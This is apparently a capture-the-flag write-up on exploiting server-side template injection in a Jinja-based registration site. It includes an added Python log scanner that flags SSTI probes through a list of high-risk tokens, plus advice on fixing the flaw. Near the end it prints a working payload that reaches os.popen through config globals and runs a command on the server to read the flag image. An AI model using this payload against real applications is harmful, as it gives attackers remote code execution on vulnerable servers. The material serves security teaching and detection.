What is the Open Flag challenge? I will tell you the location where the flag is located; you just need to access that flag.
The given website consists of two pages: a registration panel and a static page.
We notice that, upon entering a username, it gets reflected on the static page. After injecting a few test payloads we notice that the user input is not sanitized.
Therefore we can test the website for Server Side Template Injection (SSTI). We discover that the site uses the Jinja templating engine. A simple payload like the one below confirms the vulnerability: if the page reflects 49 instead of the literal text, the input is being evaluated as part of the template.
{{7*7}}
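The two observations above (template syntax arriving in a user-supplied field, and an arithmetic canary coming back evaluated rather than verbatim) are exactly what a defender would want to catch in logs and in a regression scan. The block below is an added example written for this writeup, not code from the challenge; the access-log lines are constructed for the example and the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines in combined log format. They are made up
# for this example and are not data from the challenge or its server.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "POST /register?username=alice HTTP/1.1" 302 0',
    '10.0.0.7 - - [12/Mar/2024:10:01:09 +0000] "POST /register?username=%7B%7B7*7%7D%7D HTTP/1.1" 302 0',
    '10.0.0.7 - - [12/Mar/2024:10:01:15 +0000] "POST /register?username=%7B%7Bconfig.__class__.__init__.__globals__%7D%7D HTTP/1.1" 302 0',
    '10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /static HTTP/1.1" 200 1234',
    '10.0.0.11 - - [12/Mar/2024:10:02:30 +0000] "POST /register?username=bob%24%7Bid%7D HTTP/1.1" 302 0',
]

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Delimiters used by common template engines (Jinja/Twig, ERB, EL/Freemarker, Ruby-style).
TEMPLATE_SYNTAX_RE = re.compile(r'\{\{.*?\}\}|\{%.*?%\}|\$\{.*?\}|#\{.*?\}|<%.*?%>', re.S)

# Tokens that indicate an attempt to climb from the template context into the interpreter,
# as opposed to a bare arithmetic probe.
HIGH_RISK_TOKENS = ('__class__', '__globals__', '__builtins__', '__import__', 'popen', 'subprocess')


def classify_value(value):
    """Return 'high', 'probe' or None for one decoded parameter value."""
    if not TEMPLATE_SYNTAX_RE.search(value):
        return None
    if any(tok in value for tok in HIGH_RISK_TOKENS):
        return 'high'
    return 'probe'


def find_ssti_probes(lines):
    """Scan log lines and return one finding per query parameter carrying template syntax."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        query = urlsplit(m.group('target')).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for raw in values:
                value = unquote_plus(raw)  # parse_qs decoded once; catch double-encoded probes
                severity = classify_value(value)
                if severity:
                    findings.append({
                        'ip': m.group('ip'),
                        'time': m.group('ts'),
                        'param': name,
                        'value': value,
                        'severity': severity,
                    })
    return findings


def canary_was_evaluated(sent, body):
    """True when an arithmetic canary such as {{7*7}} came back as its product (49)
    instead of verbatim, i.e. the confirmation step from the writeup, checked mechanically."""
    m = re.fullmatch(r'\{\{\s*(\d+)\s*\*\s*(\d+)\s*\}\}', sent)
    if not m:
        raise ValueError('canary must look like {{a*b}}')
    product = str(int(m.group(1)) * int(m.group(2)))
    return sent not in body and product in body


if __name__ == '__main__':
    for f in find_ssti_probes(SAMPLE_LOG):
        print(f"{f['severity']:5} {f['ip']:10} {f['param']}={f['value']}")
    print(canary_was_evaluated('{{7*7}}', '<p>Welcome 49</p>'))
```

The log scan flags three of the five sample requests: two plain probes and one high-severity attempt that references `__class__` and `__globals__`. On the application side the fix is to never build the template string from user input; pass the username as a template variable (in Jinja, `{{ username }}` with the value supplied in the render context) so the engine treats it as data rather than as template code.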
Using the crafted payload below we can exploit the SSTI and get code execution on the server.
{{config.__class__.__init__.__globals__['os'].popen('base64 flag.jpg').read()}}
This reflects the flag image, base64 encoded, in the static HTML page. Save the response to a text file and decode it with:
base64 -d flag.txt > flag.jpg
The flag is shown in the image.
Happy hacking :)